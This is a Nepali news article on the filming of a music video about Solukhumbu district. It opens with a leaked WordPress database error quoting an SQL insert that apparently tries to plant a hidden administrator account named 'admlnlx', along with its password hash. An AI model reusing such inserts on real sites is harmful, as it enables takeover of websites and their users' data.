WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVnCD/eRzYJ8B341Cn8A/aps9J1tzl.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 02:42:49', '', 'admlnlx', 'admlnlx')
काठमाण्डौ, १६ मङ्सिर । डा. रेणुका ‘सोलु’को ‘सोलुखुम्बु आउनु है हजुर’ गीतको छायाङकन अन्तिम अवस्थामा पुगेको छ । सोलुखुम्बुको सोताङमा जन्मेकी डा. रेणुकाको शब्द, जसिहाङ राईको संगीत, राई र जेनी खालिङले स्वर भरेका छन् ।
यस गीतको लागि सोलुखुम्बुका प्रतिष्ठित ब्याक्तिहरु पूर्व सभासद आङदावा शेर्पा, समाजसेवी यस बहादुर राई, प्रकाशसिङ कार्की, सोलुखुम्बु बहुमुखी क्याम्पस प्रमुख उद्वब कुमार शर्मा लगाएत बिशिष्ट ब्याक्तिहरुको सहभगितामा मङ्सिर १५ गते शनिबारको दिन छायाङकन सम्पन्न भएको छ ।
गाउले इन्टर्टेनमेन्ट प्रा लि को ब्यानरमा निर्माण भएको म्युजिक भिडियो छायाङकन गंगाराम राई र बिक्रम श्रेष्ठले गरेका छन । भिडियोको निर्देशन गंगाराम राई र न्यृत्य निदेशन देभराज गुरुङको रहेको छ ।
लेखिकाले जन्मभूमिको मायाले ओतप्रोत भएर जिल्लाका स्थान, भेग र संस्कार र जातिलाई समेत गीत मार्फत परिचित गराउने कोशिस गरेकी छिन् । पर्यटकीय स्थल पाँचपोखरी र दुधकुण्ड पोखरी मात्र हैन्, सुनपाती लगायतका वनस्पतिले पनि जिल्लाको परिचयलाई जोड्न भ्याएकी छिन् ।
महिला शसक्तिकरणलाई केन्द्रभागमा राखेर साहित्यको माध्यमवाट अस्तित्व र पहिचान खोज्दै आउनुभएका डा. रेणुकाले यो सृजनालाई जन्मभूमि प्रति सर्मपित गरेकी छिन् ।







